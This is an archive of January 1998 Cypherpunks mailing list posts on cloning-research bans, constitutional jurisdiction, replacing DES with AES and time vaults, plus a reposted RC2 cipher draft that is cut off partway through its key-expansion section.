Most candidates for untraceable/secure storage and retrieval are NOT in
this corner, yet. (Kiddie porn may be, but whistleblowing and scientific
information are not.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Tue, 13 Jan 1998 04:47:37 +0800
To: cypherpunks@ssz.com
Subject: Re: Trust through anonymity; time vaults
Message-ID: <199801122019.UAA04395@notatla.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




The time vault suggestion resembles one from Tim May in 1993.

Rivest Shamir and Wagner also addressed time vaults by requiring a
computation (resistant to parallel calculation and of reasonably
well-defined length) to decrypt the message.

under http://theory.lcs.mit.edu/~rivest/


--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 13 Jan 1998 12:36:59 +0800
To: cypherpunks@Algebra.COM
Subject: Announcement: Clonerpunks mailing list
In-Reply-To: <199801130405.XAA26577@mx02.together.net>
Message-ID: <v03102807b0e09d80959c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:05 PM -0800 1/12/98, Brian B. Riley wrote:

>On 1/12/98 3:32 PM, Tim May (tcmay@got.net)  passed this wisdom:
>
>>Any implications for crypto? If Congress can successfully make
>>certain types of science illegal, felonizing the search for truth,
>>why not a ban on certain types of mathematics research?
>
> I think many of us are understandably nervous about the mistakes that
>could be made in the process of perfecting human cloning. But Tim's
>point is well taken, yet another potential 'slippery slope.'
>


To subscribe to the Clonerpunks list, send a message to
majordomo@dolly.com, with the message body, "subscribe clonerpunks".

The Clonerpunks list is a high-volume list devoted to the issues and
technology surrounding human and animal cloning. Clones are welcome.

Warning: Participation by U.S. subjects, or visitors to the U.S., or those
who have ever watched American television, is not allowed on the
Clonerpunks list, under the terms of the Children's Safety and Human
Decency Act of 1998.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 13 Jan 1998 10:54:07 +0800
To: cypherpunks@cyberpass.net
Subject: Feds to Idaho: Kiss Our Butts
Message-ID: <199801130255.UAA21084@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



The manslaughter case against Ruby Ridge shooter Lon Horiuchi was
effectively neutered today when a federal judge acquiesed to demands
by Justice Department lawyers and moved the case out of Idaho's
jurisdiction and into federal court.  This means that Horiuchi will be
tried in federal court in front of a federal jury on state
manslaughter charges, and not in front of a jury from Idaho's Boundary
County, where the shooting took place.
 
This ruling, by U.S. District Judge Edward Lodge, came just six days
after Boundary County Magistrate Quentin Harden ordered Horiuchi to
stand trial.  State manslaughter charges had been filed against
Horiuchi for the death of Vicki Weaver in August.
 
The Justice Department, which has denied that Horiuchi did anything
wrong, provided the lawyers who argued that any case in which federal
agents are acting in their official capacity may be transferred and
tried in federal court, in front of a federal jury.
 
The trial is scheduled to begin March 10.  Horiochi has continued to
work for the FBI since the charges were filed.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 13 Jan 1998 15:56:07 +0800
To: Adam Back <eternity@internexus.net
Subject: Re: autonomous agents
In-Reply-To: <199801121925.TAA00539@server.eternity.org>
Message-ID: <v03110732b0e0a69ca4e6@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:25 AM -0800 1/12/98, Adam Back wrote:
>For agents to be able to achieve anything useful, the Java sandbox
>model has to be relaxed to allow the agent to make network connections
>to other than the machine the code was served from.  Java has support
>for this in that signed applications are allowed to make external
>network connections.

The Java security model proposed for version 1.2 (now in some form of beta)
supports this kind of distinction.


-------------------------------------------------------------------------
Bill Frantz       | One party wants to control | Periwinkle -- Consulting
(408)356-8506     | what you do in the bedroom,| 16345 Englewood Ave.
frantz@netcom.com | the other in the boardroom.| Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 11:12:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Trial jurisdiction options
Message-ID: <199801130337.VAA24688@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




			       ARTICLE III. 
 
Section 2.  The judicial Power shall extend to all Cases, in Law and Equity, 
arising under this Constitution, the Laws of the United States, and Treaties 
made, or which shall be made, under their Authority; -- to all Cases affecting 
Ambassadors, other public Ministers and Consuls; -- to all Cases of admiralty 
and maritime Jurisdiction; -- to Controversies between two or more States; -- 
between a State and Citizens of another State; -- between Citizens of 
different States; -- between Citizens of the same State claiming Lands under 
Grants of different States; -- and between a State, or the Citizens thereof, 
and foreign States, Citizens or Subjects. 
	In all Cases, affecting Ambassadors, other public Ministers and 
Consuls, and those in which a State shall be Party, the supreme Court shall 
have original Jurisdiction.  In all other Cases before mentioned, the supreme 
Court shall have appellate Jurisdiction, both as to Law and Fact, with such 
Exceptions, and under such Regulations as the Congress shall make. 
	The Trial of all Crimes, except in Cases of Impeachment, shall be 
by Jury; and such Trial shall be held in the State where the said Crimes 
shall have been committed; but when not committed within any State, the Trial 
shall be at such Place or Places as the Congress may by Law have directed. 
 


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 11:43:44 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801130410.WAA25119@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 12 Jan 1998 19:14:05 -0800
> From: Blanc <blancw@cnw.com>
> Subject: Re: rant on the morality of confidentiality 

> >something most anarchists here will deny is the existence of something
> >that could be called *immoral science*. is there such a thing? 
> ............................................................
> 
> No.  There are, however, immoral scientists.

According to who? The scientist who is supposedly immoral? Obviously their
actions aren't against their beliefs. The observer who is claiming it is
immoral because they *believe* it to be immoral? Morality is a function of
human psychology and not a fundamental result of existance. The relationship
is similar to that between A, T, C, G, U and the genome.

> actual manner of existence:  "science" does not exist without those
> individuals who have set themselves to pursue it.  They should bear the
> blame if they practice it immorally.

Who is so moral that they may decide what is immoral? If you're a Christian
the answer is simple 'judge not lest ye be judged'. Jesus stopped the
stonning of an adulteress by saying that he who was without sin could throw
the first stone. Since he was the only one without sin (by defintion in
Christianity) he should have been the one to throw the first stone. What did
he do? He sent everyone home with the admonishment to sin no more.

> .  being smart enough to pursue scientific research

It doesn't necessarily take smarts.

> .  being successful in the scientific pursuit of truths

What truths? Science isn't involved in 'truth' let alone 'Truth'.

> .  giving a damn about the consequences of the effects of research as it
> affects humanity or other living things (as when it is imposed upon them)

So you propose that ignorance of the consequences will some how protect us?

> .  responsibility in science

Responsibility to who? The person(s) paying the bill, your fellow scientist,
the society you live in, the world you inhabit, the generations to follow?

> .  responsibility in science as practiced by mendicants of the State

Don't confuse working for the state as something that somehow mediates the
basic tenents of science. If to get the job you may have to give up some
scientific practices then at that point you aren't practicing science anymore.

> .  the regulation of the methods of science

That's easy, the theories work when applied in experiments.

> I become exceedingly uncomfortable at the realization that I have to buy an
> astronomy magazine from the store, paying yet again for info, in order to
> find out some of what they're doing at NASA.

Try:

www.nasa.gov
jpl.nasa.gov
or simply send email to Ron Baalke at JPL (you could call him on the phone
if you don't mind paying the bill)

>  To think that a responsible
> citizen like myself must go out searching for the info themselves, using
> whatever resources they can find or pay for, in order to become informed!

Why do they have a responsibility to drop it on your doorstep?

> There is a book in Objectivist literature which presents the idea of

What book?

> "context dropping", which is, that in order for some people to function as
> if things were normal and that what they're doing is consistent with moral
> principles, they must drop a part of their information out of sight, out of
> thought, so that their actions appear logically related and make sense  -
> they eliminate elements from the given context, crucial essentials which
> make the difference in its character.  People like these might practice
> secrecy in keeping information from others, but equally significant, they
> also hide things from themselves.

Everyone is like that. It is one of the reasons science requires public
dialog on its results. You can fool some of the people most of the time,
most of the people some of the time, but you can't fool all the people all
the time.

Sooner or later somebody will notice the king (theory) is butt naked
(doesn't work when applied in experiment).

> It's possible for some people to override the boundaries of decency, even
> if they're otherwise smart enough to pursue science.  But what would you
> expect cryptographers to do about it?

Cryptographers are scientist also.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 11:52:18 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: HP BBS's? Telnet? (fwd)
Message-ID: <199801130417.WAA25237@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Wardemon" <Wardemon@erols.com>
> Subject: HP BBS's? Telnet?
> Date: Mon, 12 Jan 1998 22:37:34 -0500

> Does anyone have any elite HP BBS's that I could telnet to ????
> Thanks

I usualy use ftp.hp.com

What version of HP/UX are you running?


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 13 Jan 1998 11:38:59 +0800
To: cypherpunks@toad.com
Subject: Tales of the Crypto
Message-ID: <f55caa4c652027afccfaa90c2e376c6f@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




               Tales of the Crypto

               U.S. government works to replace Data
               Encryption Standard

               By Jim Kerstetter, PC Week Online 
               01.12.98 10:00 am ET 

               The days of DES, which for the
               past 20 years has been the
               foundation for government and
               commercial cryptography around
               the world, are numbered.

               The U.S. government has
               embarked on an expansive
               project to replace the Data
               Encryption Standard. By the end
               of this year, a panel of
               cryptographers, headed by the
               National Institute of Standards
               and Technology, is expected to
               pick a new cryptographic
               algorithm to replace DES as the
               government's standard.

               The changeover to the new
               algorithm, to be called the
               Advanced Encryption Standard,
               won't happen overnight. In fact,
               the selection process could end
               up taking years. But whatever
               AES ultimately becomes, one
               thing is clear: The new standard
               will force major change for both
               the IT and developer
               communities.

               Anyone selling the government software that uses
               encryption for security will have to support the AES
               algorithm, which could become the standard for
               decades to come. Corporations conducting secure
               transactions with the government over the Internet will
               also have to rely on software that supports AES. And,
               in several years, AES could replace DES for private-key
               encryption in most commercial security algorithms.

               "Right now, I'm using PGP [Pretty Good Privacy] for
               some things. But the bulk of what we use here is with
               DES," said Paul O'Donnell, security manager at an
               Illinois manufacturer. "Should I be paying attention to
               what they [NIST] are doing? I suppose so."

               It's a change many say is overdue. DES was developed
               by IBM and the government in the 1970s. It was
               intended to last five to 10 years, said Dennis Branstad,
               an early DES developer for NIST's forerunner, the
               Institute of Computer Sciences and Technology.

               "It was a good algorithm. It turned out to be better
               than we thought," said Branstad, now director of
               cryptographic technologies at Trusted Information
               Systems Inc., in Glenwood, Md. "But it took longer to
               be accepted than we thought it would. There was no
               demand for it."

               DES is a symmetric, or private, key algorithm in which
               both the sender and receiver of a message must have a
               copy of the private key. It also can be used to encrypt
               data on a hard disk. It is found in an array of security
               protocols in the corporate world, ranging from secure
               E-mail software to virtual private network technology.

               DES' 56-bit private keys were unhackable until last
               year, when a nationwide network of computer users
               broke a DES key in 140 days--hardly an easy effort,
               but a harbinger of things to come as processing speed
               increases. Some experts now argue that it could take
               less than a week to break DES, with less than
               $100,000 worth of hardware. According to John Callas,
               chief technology officer of the Total Network Security
               Division of Network Associates Inc., a good hacker,
               with about $50,000 worth of specialty hardware, could
               crack a DES key in an hour.

               "Anybody who can afford a BMW can afford a DES
               cracker," said Callas, whose hypothesis will be tested
               in DES Challenge II this week at the RSA Data
               Security Conference, in San Francisco.

               Since most experts agree it's time to replace DES, the
               question becomes, Just what will AES be?

               Last summer, NIST released a 30-page document
               outlining its recommendations for a DES replacement
               and asking for submissions. There are three minimum
               technical criteria:

                    The algorithm must be symmetric, or private, key.
                    Public algorithms, such as elliptic curve (see
                    related story) and Diffie-Hellman, though useful
                    for authentication and the initial handshake
                    between users, are considered too slow.

                    The algorithm must be a "block cipher." Within
                    the realm of symmetric keys there are two basic
                    types of ciphers, block and stream. A block
                    cipher, like DES, encrypts specific chunks of
                    data. A stream cipher, like RSA Data Security
                    Inc.'s RC4 algorithm, encrypts a steady flow of
                    information. RC4 is the base encryption engine
                    for Secure Sockets Layer, the security technology
                    used in browsers. Some cryptographers are
                    pushing NIST to consider stream ciphers because
                    of their growing popularity.

                    The algorithm has to be capable of supporting key
                    lengths ranging from 128 bits to 256 bits and
                    variable blocks of data.

               AES must also be efficient. Triple DES, a later version
               of the government's algorithm also developed by IBM,
               is far more secure than DES, running the 56-bit
               encryption three times. But that strength is also its
               weakness, because the repetition cycle slows it down
               considerably.

               Finally, the AES algorithm has to be made public and
               royalty-free. That could prove to be a sticking point for
               RSA, of Redwood City, Calif., which has traditionally
               held on to the royalties of its cryptographic creations.

               A conference at which cryptographers will present
               their algorithms is scheduled for this summer. And
               although NIST officials hope their analysis will be
               completed in 1998, many think it may take years to
               review the submittals, which are due by April 15.

               Major security vendors are noncommittal on proposing
               an algorithm. IBM, which created DES, with help from
               the National Security Agency, is hedging on whether it
               will participate. Triple DES is considered a likely entry,
               but its inefficiency could make it a difficult sell.
               Another IBM algorithm, DES/SK, could be in the
               running. RSA, if it decides to enter, could submit
               either its RC4 algorithm (the stream cipher) or RC5,
               which is a block cipher.

               Other likely competitors include Cast, a royalty-free
               algorithm controlled by Entrust Technologies Inc., or
               the unpatented Blowfish algorithm, created by Bruce
               Schneier.

               "It will be a standard for 20 to 30 years, in legacy
               systems for at least another 10, securing data that
               might need to be secured for at least another 20,"
               Schneier wrote in a letter to NIST. "This means we are
               trying to estimate security in the year 2060. I can't
               estimate security 10 years from now, let alone 60. The
               only wise option is to be very conservative."

                       A Data Encryption Standard primer

                     What is DES?
                     It was designed by IBM and endorsed by the U.S.
                     government in 1977.

                     What kind of encryption key does DES use?
                     A symmetric, or private, key in which both the sender
                     and the receiver know the key. It can also be used to
                     encrypt data on a hard disk.

                     What key length does DES use?
                     56 bits.

                     Is DES safe?
                     For most purposes, yes. But DES was hacked for the
                     first time last year, and cryptographers worry that
                     improved processing speeds will spell its demise.




                 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wardemon" <Wardemon@erols.com>
Date: Tue, 13 Jan 1998 11:42:52 +0800
To: <cypherpunks@toad.com>
Subject: HP BBS's? Telnet?
Message-ID: <199801130340.WAA19281@smtp3.erols.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have any elite HP BBS's that I could telnet to ????
Thanks

wardemon@erols.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 13 Jan 1998 12:08:57 +0800
To: "CypherPunks List" <cypherpunks@Algebra.COM>
Subject: Re: Talk of Banning Research into Human Cloning
Message-ID: <199801130405.XAA26577@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 1/12/98 3:32 PM, Tim May (tcmay@got.net)  passed this wisdom:

>Any implications for crypto? If Congress can successfully make 
>certain types of science illegal, felonizing the search for truth, 
>why not a ban on certain types of mathematics research?  

 I think many of us are understandably nervous about the mistakes that
could be made in the process of perfecting human cloning. But Tim's
point is well taken, yet another potential 'slippery slope.'

  It also begs the question again of 'are we getting too paranoid?' I
think the nanswer is still "no, not yet", as the Klinton
administration proves to us almost every day it seems.
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNLroFD7r4fUXwraZAQF9Cwf6AtGeZgKDN3nwY0FMsxoTgwXgalRmjGJT
gqliyEIdYfqcQK/kGTFYvBbcGd0xl1dr+XpmJXvr7ItQ8lrsyyqEozGC2KJGYpJe
7C8nMl/nf49Pd4UcJRNZb86qAdwAB7wERW7nL8aGB5Bzm46tKEeaAS2jrzxVOgIt
z7ysxDd+VNoU2czWrergrhvDjbtnXKjPVcIfwkN0M57SJgdWqIlX/fo5HLuiw8IZ
i/Qg8JsLXJgnWr5ZDgrSRSNgVqmwAaV8980piBGyqY0X9ytOcYdjV197+rz55Hkh
iqzIQm6aQa5BJuDy3p8B44LlICtxFB0XZP1UdgvRCbFWO3YD8P3mOA==
=O6Dk
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

   "It's what you learn after you know it all that counts"  
           John Wooden






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 13 Jan 1998 12:38:07 +0800
To: cypherpunks@cyberpass.net
Subject: Crypto Jokes
Message-ID: <1fcdbf50ad69ffa37f0660c6b77013e9@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



>Inspired by "Crypto Kong," contributions of crypto jokes
>are requested, to enliven our Web site, which is pretty
>gray these days without congressional buffoonery.

Just post the contents of http://www.meganet.com/explain.htm. Those people
are just plain stupid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Tue, 13 Jan 1998 07:08:05 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199801122245.XAA04631@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



If man were meant to clone, he'd have twins.

 - Anon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Tue, 13 Jan 1998 08:20:59 +0800
To: cypherpunks@toad.com
Subject: Re: Congratulations!
Message-ID: <19980113000743.988.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



>To: Anonymous <anon@anon.efga.org>
>cc: cypherpunks@toad.com, abuse@MCI.Com,   >hostmaster@cyber-dyne.com

Ha, ha, ha! who CC'd the "Congratulations" thread to those
addresses?? <LOL> (would they know how to smurf d00d?)

This list gets fucking better!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 13:45:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
Message-ID: <199801130612.AAA25763@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 13 Jan 1998 06:10:14 +0100 (MET)
> Subject: Re: Talk of Banning Research into Human Cloning
> From: nobody@REPLAY.COM (Anonymous)

> > Though I'm not a constitutional expert, this would seem to me to be a
> > violation of various rights. A First Amendment right to speak and publish
> > as one wishes for one, a Fourth Amendment right against search and seizure
> 
> Actually, not at all.
> 
> There is no ban on publishing information on cloning, "just" a ban on the
> activity.

Spin doctor bullshit. Without the research there isn't anything to publish.
By banning the basic research we would in fact be banning the publishing of
the results of that scientific research.

>  Hence the first amendment is not implicated.  If it were the
> case the every action (as opposed to speech/publication) were protected by
> the 1st Am. then every statute making robbery a crime would be
> unconstitutional too.

Not at all. Equating swinging of ones fist in a empty field and swinging it
into somebodies nose and then taking that supposition as justification to
ban fist swinging *is* most certainly unconstitutional. Furthermore, robbery
isn't illegal under the Constitution unless its the federal government
taking the material and refusing to follow the Constitutional directive to
pay for *all* property, irrespective of how it was gained, for public use as
those duties are relegated per the 10th to the purvue of the states.

> Similarly, the 4th Am. is not implicated.  The right to be secure against
> UNREASONABLE search and seizure is not violated when and if congress
> passes a law defining a new crime, or you are arrested for committing it.

The question here is whether Congress even *has* the power to regulate those
sorts of behaviours without an amendment being passed by the states to
surrender their authority per the 9th and 10th to the federal government.

> > and to be secure in one's papers, and probably more general rights that
> > have long-held that government agents cannot tell people what books they
> 
> again, note that the ban is on CLONING, not THINKING OR WRITING OR READING
> about cloning.  It's not the same thing. 

Without doing the research it isn't possible to think very much about
cloning except in a *very* abstract manner. That forcing of abstraction
against ones will may very well infact be unconstitutional.

> > may read, what thinking they may do, and  whom they may asssociate with (if
> > the Civil Rights Act is viewed as the unconstitutional anomaly it is).
> 
> This is an aside, but the CRA is in no way anomalous given the 13th, 14th
> and 15th Amendments.  It is only "anomalous" if one sticks to the
> Constitution as written in the 18th century... and ignores the articles
> written in that same century that clearly contemplate amendments....

The articles contemplating the amendments are irrelevant to this issue. Only
the actual amendments are relevant. What people might *want* to do has
nothing to do with what they *can* do under the limiting documents of this
country.

> > But a ban on cloning research would not be a matter of "national security,"
> > only of ethics and religious beliefs. Whatever the arguments for banning
> > unapproved research into CBW and nuclear weapons, banning cloning research
> > is an entirely different set of issues.
> > 
> 
> Arguably, many of the legal bans in force today are due to ethics, e.g.:

No, they are a result of political wrangling by small groups to gain
political power and the economic and social conseuences thereof. They also
result from a clearly premeditated absolution of the Constitution that these
self same 'representatives' gave an oath to uphold with their lives. The
justification that is profered is the ethics of the constituents.

> A. Michael Froomkin          +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law   
> U. Miami School of Law       froomkin@law.miami.edu
> P.O. Box 248087              http://www.law.miami.edu/~froomkin/
> Coral Gables, FL 33124 USA   It's warm here.

Your a law professor and your logic, respect for the Constitution, and
basic scientific comprehension is this bad? No damn wonder we're in the shit
hole we're in now...


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 14:04:29 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Federal govt. & Science - Const. limits
Message-ID: <199801130632.AAA25882@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Congress has *no* authority to ban *any* scientific research. In fact they
are specificaly enjoined to *promote* it.


Section 8.  The Congress shall have Power... 

[text deleted]

	To promote the Progress of Science and useful Arts, by securing 
for limited Times to Authors and Inventors the exclusive Right to their 
respective Writings and Discoveries; 

[remainder deleted]

 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 
 
 
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 14:08:43 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Congress' *real* job...
Message-ID: <199801130636.AAA25986@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Congress' real job should not be passing laws providing funding, prohibiting
activities, etc. It *should* be in creating and passing Constitutional
amendments per the 10th that re-define the responsibilities and duties of
the federal government within the changing millieu of the current society.
This way the people via their state representatives have a much closer input
into what the feds are actualy enpowered to do and to who.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 13 Jan 1998 14:03:18 +0800
To: cypherpunks@toad.com
Subject: Description of the RC2(r) Encryption Algorithm
Message-ID: <f24aac230b23f45859c1fcf40dff1bc1@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




                                                            Ron Rivest
                                   MIT Laboratory for Computer Science
                                           and RSA Data Security, Inc.
                                                         November 1997
Request for Comments:
Category: Informational                 

           
            A Description of the RC2(r) Encryption Algorithm


Status of this Memo

This memo provides information for the Internet community.  This memo
does not specify an Internet standard of any kind.  Distribution of
this memo is unlimited.

This document is an Internet-Draft. Internet-Drafts are working
documents of the Internet Engineering Task Force (IETF), its areas,
and its working groups. Note that other groups may also distribute
working documents as Internet-Drafts.
 
Internet-Drafts are draft documents valid for a maximum of six months
and may be updated, replaced, or obsoleted by other documents at any
time. It is inappropriate to use Internet-Drafts as reference material
or to cite them other than as "work in progress."
 
To learn the current status of any Internet-Draft, please check the
"1id-abstracts.txt" listing contained in the Internet-Drafts Shadow
Directories on ftp.is.co.za (Africa), nic.nordu.net (Europe),
munnari.oz.au (Pacific Rim), ds.internic.net (US East Coast), or
ftp.isi.edu (US West Coast).


1. Introduction

This draft is an RSA Laboratories Technical Note. It is meant for
informational use by the Internet community.

This memo describes a conventional (secret-key) block encryption
algorithm, called RC2, which may be considered as a proposal for 
a DES replacement. The input and output block sizes are 64 bits 
each. The key size is variable, from one byte up to 128 bytes, 
although the current implementation uses eight bytes.

The algorithm is designed to be easy to implement on 16-bit
microprocessors. On an IBM AT, the encryption runs about twice as fast
as DES (assuming that key expansion has been done).

1.1 Algorithm description

We use the term "word" to denote a 16-bit quantity. The symbol + 
will denote twos-complement addition. The symbol & will denote 
the bitwise "and" operation. The term XOR will denote the bitwise
"exclusive-or" operation. The symbol ~ will denote bitwise 
complement.  The symbol ^ will denote the exponentiation 
operation.  The term MOD will denote the modulo operation.

There are three separate algorithms involved:

  Key expansion. This takes a (variable-length) input key and
  produces an expanded key consisting of 64 words K[0],...,K[63].

  Encryption. This takes a 64-bit input quantity stored in words
  R[0], ..., R[3] and encrypts it "in place" (the result is left 
  in R[0], ..., R[3]).

  Decryption. The inverse operation to encryption.


2. Key expansion

Since we will be dealing with eight-bit byte operations as well
as 16-bit word operations, we will use two alternative notations

for referring to the key buffer:

     For word operations, we will refer to the positions of the
          buffer as K[0], ..., K[63]; each K[i] is a 16-bit word.
          
     For byte operations,  we will refer to the key buffer as
          L[0], ..., L[127]; each L[i] is an eight-bit byte.
          
These are alternative views of the same data buffer. At all times
it will be true that

              K[i] = L[2*i] + 256*L[2*i+1].

(Note that the low-order byte of each K word is given before the
high-order byte.)

We will assume that exactly T bytes of key are supplied, for some
